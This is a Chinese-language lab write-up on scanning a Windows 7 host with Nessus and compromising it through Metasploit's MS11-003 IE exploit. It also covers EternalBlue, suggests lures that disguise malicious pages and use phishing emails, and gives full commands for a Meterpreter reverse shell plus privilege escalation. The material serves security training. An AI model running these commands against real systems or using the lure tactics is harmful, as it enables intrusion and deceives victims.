當(dāng)前位置:首頁(yè) > IT技術(shù) > Windows編程 > 正文

Metasploit攻擊win7實(shí)例
2021-10-20 10:37:45

實(shí)驗(yàn)思考題:

1)嘗試使用Nessus對(duì)Android設(shè)備和Cisco路由器進(jìn)行掃描,并分析掃描結(jié)果?

2)查閱微軟漏洞更新信息,有哪些重大的漏洞能攻破未打任何補(bǔ)丁的win7系統(tǒng)?

3)思考如何設(shè)計(jì)誘騙策略來(lái)提高目標(biāo)用戶(hù)點(diǎn)擊我們構(gòu)造的惡意網(wǎng)頁(yè)的幾率?

1:

2:MS17-010遠(yuǎn)程溢出

MS17-010漏洞出現(xiàn)在Windows SMB v1中的內(nèi)核態(tài)函數(shù)srv!SrvOs2FeaListToNt在處理FEA(File Extended Attributes)轉(zhuǎn)換時(shí),在大非分頁(yè)池(Large Non-Paged Kernel Pool)上存在緩沖區(qū)溢出。
函數(shù)srv!SrvOs2FeaListToNt在將FEA list轉(zhuǎn)換成NTFEA(Windows NT FEA) list前會(huì)調(diào)用。srv!SrvOs2FeaListSizeToNt去計(jì)算轉(zhuǎn)換后的FEA lsit的大小,因計(jì)算大小錯(cuò)誤,而導(dǎo)致緩沖區(qū)溢出。

CVE-2017-0144 EternalBlue(永恒之藍(lán))

EternalBlue(永恒之藍(lán))據(jù)稱(chēng)是方程式組織在其漏洞利用框架中一個(gè)針對(duì)SMB服務(wù)進(jìn)行攻擊的模塊,由于其涉及漏洞的影響廣泛性及利用穩(wěn)定性,在被公開(kāi)以后為破壞性巨大的勒索蠕蟲(chóng) WannaCry所用而名噪一時(shí)。360威脅情報(bào)中心對(duì)于WannaCry的活動(dòng)持續(xù)地進(jìn)行著監(jiān)控,我們看到的趨勢(shì)是 WannaCry的感染量還在增加,說(shuō)明作為蠕蟲(chóng)主要傳播手段的EternalBlue相應(yīng)的漏洞還大量存在著。但是,對(duì)于EternalBlue 這個(gè)攻擊利器本身的技術(shù)分析在公開(kāi)渠道上看到的討論其實(shí)并不充分,本文嘗試通過(guò)一個(gè)較完全的分析梳理相關(guān)的細(xì)節(jié),揭示其成因和相應(yīng)的利用技巧。

漏洞編號(hào)

CVE-2017-0145
CVE-2017-0146
CVE-2017-0147?
CVE-2017-0148?
CVE-2017-11780?
CVE-2019-0708?
CVE-2019-1181?
CVE-2019-1182?

3:我們可以把惡意網(wǎng)頁(yè)外觀包裝成人們平時(shí)正常使用的一些軟件。同時(shí)可以通過(guò)發(fā)送誘騙郵件,有道人們主動(dòng)打開(kāi)網(wǎng)頁(yè)。

預(yù)備知識(shí)

Nessus基本介紹

Nessus是一個(gè)功能強(qiáng)大而又易于使用的網(wǎng)絡(luò)和主機(jī)漏洞評(píng)估工具,分為免費(fèi)的家庭版和付費(fèi)的企業(yè)版。Nessus6.0以后采取Browser/Server模式,Server端負(fù)責(zé)進(jìn)行安全檢查、具體的掃描任務(wù),客戶(hù)端用來(lái)配置管理服務(wù)器端。服務(wù)端采用plug-in的體系,允許用戶(hù)加入執(zhí)行特定功能的插件,這插件可以進(jìn)行更快速和更復(fù)雜的安全檢查。Nessus自帶大量安全檢查插件能夠滿足一般用戶(hù)的安全評(píng)估任務(wù)需要,如果有特殊需要也可以將自己開(kāi)發(fā)的安全檢查插件集成到Nessus中。

和其他安全掃描工具相比,Nessus主要優(yōu)勢(shì)在于免費(fèi)、擴(kuò)展性強(qiáng),容易使用以及能夠?qū)δ繕?biāo)系統(tǒng)進(jìn)行全面的漏洞掃描。

默認(rèn)狀態(tài)下, Nessus安裝成功后會(huì)開(kāi)機(jī)自啟動(dòng),用戶(hù)使用安裝時(shí)配置的賬號(hào)登陸其管理界面,添加掃描任務(wù),根據(jù)相關(guān)需要對(duì)掃描任務(wù)的相關(guān)屬性進(jìn)行詳細(xì)的配置。等掃描完成以后,會(huì)生成一份詳細(xì)的報(bào)告,報(bào)告里會(huì)將掃描結(jié)果按照危險(xiǎn)系數(shù)高低分成高危漏洞、中危漏洞、低危漏洞三類(lèi),我們一般重點(diǎn)關(guān)注高危漏洞,中危漏洞利用條件會(huì)比較苛刻,低危漏洞基本沒(méi)有利用的可能。查看高危漏洞詳情,根據(jù)漏洞簡(jiǎn)介信息使用google搜索是否存在已知的Exp和攻擊方法可以提高安全測(cè)試效率。

實(shí)驗(yàn)?zāi)康?/div>

通過(guò)該實(shí)驗(yàn)熟悉Nessus漏洞掃描工具的安裝和主機(jī)漏洞掃描的方法,學(xué)會(huì)利用Nessus掃描結(jié)果篩選合適的Metasploit攻擊模塊進(jìn)行安全測(cè)試、攻擊。

實(shí)驗(yàn)環(huán)境

圖1 實(shí)驗(yàn)拓?fù)鋱D

漏洞主機(jī):win7,IP地址:10.1.1.129

攻擊主機(jī):Kali linux,IP地址:10.1.1.128

實(shí)驗(yàn)步驟一

初步了解實(shí)驗(yàn)環(huán)境及Nessus安裝(實(shí)驗(yàn)步驟一操作已全部完成,實(shí)驗(yàn)環(huán)境內(nèi)的操作從實(shí)驗(yàn)步驟二開(kāi)始)

1.查看win7漏洞主機(jī)的登錄用戶(hù)及網(wǎng)絡(luò)配置信息,從下圖2可以看出漏洞主機(jī)IP為10.1.1.129。使用命令如下:

ipconfig???查看網(wǎng)絡(luò)配置信息

?

?

2.為了更好的演示攻擊win7系統(tǒng)實(shí)例需要關(guān)閉win7系統(tǒng)的防火墻,win+R輸入cmd,運(yùn)行“netsh firewall set opmode mode=disable”命令

?

?

?

?

3.查看攻擊者主機(jī)登陸用戶(hù)及網(wǎng)絡(luò)配置信息,從下圖3可以看出攻擊主機(jī)登陸用戶(hù)為root ,IP為10.1.1.128

whoami????查看當(dāng)前登陸用戶(hù)

ifconfig????查看網(wǎng)絡(luò)配置信息

?

?

?

4.在Nessus官網(wǎng)下載頁(yè)面選擇適合Kali linux的安裝程序。經(jīng)實(shí)驗(yàn)證明多個(gè)版本的都可以在kali linux上安裝成功,這里選擇“Debian 6,7,8,9/Kali Linux 1,2017.3 AMD64”版本程序。下載之后,拷貝到Kali linux主機(jī)上,運(yùn)行下列命令進(jìn)行安裝:

dpkg -i Nessus-8.9.1-debian6_amd64.deb 安裝Debian安裝包

新建一個(gè)掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。

?

新建一個(gè)掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。

?

配置掃描信息,主要設(shè)置掃描名稱(chēng)、描述和掃描目標(biāo)三個(gè)信息即可,其他配置選擇默認(rèn),配置完成點(diǎn)擊Save。選擇對(duì)整個(gè)10.1.1.0/24網(wǎng)段進(jìn)行掃描,如下圖所示。

?

?

掃描結(jié)束后,Nessus會(huì)很直觀的顯示出目標(biāo)網(wǎng)段的安全情況。下圖顯示了整個(gè)網(wǎng)段的安全信息。Nessus將安全問(wèn)題歸類(lèi)為Info/Low/Medium/High/Critical五個(gè)等級(jí),其中Critical等級(jí)的問(wèn)題是最危險(xiǎn)的,Info級(jí)別的問(wèn)題通常是無(wú)關(guān)痛癢的信息顯示問(wèn)題。

?

?

?

10.1.1.129主機(jī)漏洞概況

選中高危漏洞,Nessus給出了該漏洞的介紹、風(fēng)險(xiǎn)信息、解決方案等詳細(xì)信息。Risk information對(duì)于攻擊者來(lái)說(shuō)非常有用,可以根據(jù)Risk information去Google搜索是否存在已知的漏洞利用Exp。

?

?

MS11-030漏洞詳情

?

?

?

實(shí)驗(yàn)步驟三

利用MS11_003 IE漏洞攻擊win7主機(jī)

步驟二中掃描得到win7主機(jī)系統(tǒng)存在MS11_030解析漏洞,但是該漏洞利用條件較為苛刻,因此選擇MS11_003 IE CSS Import漏洞來(lái)演示如何通過(guò)誘騙攻擊者點(diǎn)擊我們精心構(gòu)造的含有攻擊代碼的網(wǎng)頁(yè)來(lái)實(shí)現(xiàn)系統(tǒng)入侵。

1.在kali中執(zhí)行“msfconsole”,啟動(dòng)metasploit

?

?2.運(yùn)行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP

檢查是否存在該漏洞

?

?3.運(yùn)行命令:show options,查看配置選項(xiàng)

?

?

?

?

4.設(shè)置生成的惡意網(wǎng)頁(yè)的URI為baidu.com

運(yùn)行命令:set URIPATH baidu.com

?

5.為防止服務(wù)器端口沖突,設(shè)置服務(wù)器端口為8060,避開(kāi)常用端口8080

?

運(yùn)行命令:set SRVPORT 8060

?

6.設(shè)置攻擊負(fù)載

運(yùn)行命令:set PAYLOAD windows/meterpreter/reverse_tcp

?

?查看還需要設(shè)置那些內(nèi)容

?

8.設(shè)置LHOST以綁定本地IP

set LHOST 10.1.1.128

?

9.為避免沖突設(shè)置LPORT

?

運(yùn)行命令:set LPORT 8866

10.運(yùn)行命令“exploit”開(kāi)始進(jìn)行攻擊,生成惡意網(wǎng)頁(yè)和做好其他準(zhǔn)備,只等受害者訪問(wèn)我們構(gòu)造的惡意網(wǎng)頁(yè)

?

?

?

11.在 Win7靶機(jī)打開(kāi)IE,訪問(wèn)http://10.1.1.128:8060/baidu.com,模擬受害者誤點(diǎn)擊網(wǎng)頁(yè),靶機(jī)IE如下圖所示,攻擊者M(jìn)etasploit顯示如下圖所示信息表明攻擊成功。

?

?

?

?

?

?

12.驗(yàn)證攻擊是否成功。列出當(dāng)前成功建立的回話,任意進(jìn)入一個(gè)回話,查看攻擊者的身份??梢試L試使用getsystem進(jìn)行進(jìn)一步的提權(quán),如果提權(quán)失敗則可以采取上傳提權(quán)exe程序進(jìn)行提權(quán)的方案獲得最高權(quán)限。

sessions???列出所有會(huì)話

sessions -i 1???進(jìn)入1號(hào)會(huì)話

getuid???查看當(dāng)前用戶(hù)

?

?

?

?

?

本文摘自 :https://www.cnblogs.com/

開(kāi)通會(huì)員,享受整站包年服務(wù)立即開(kāi)通 >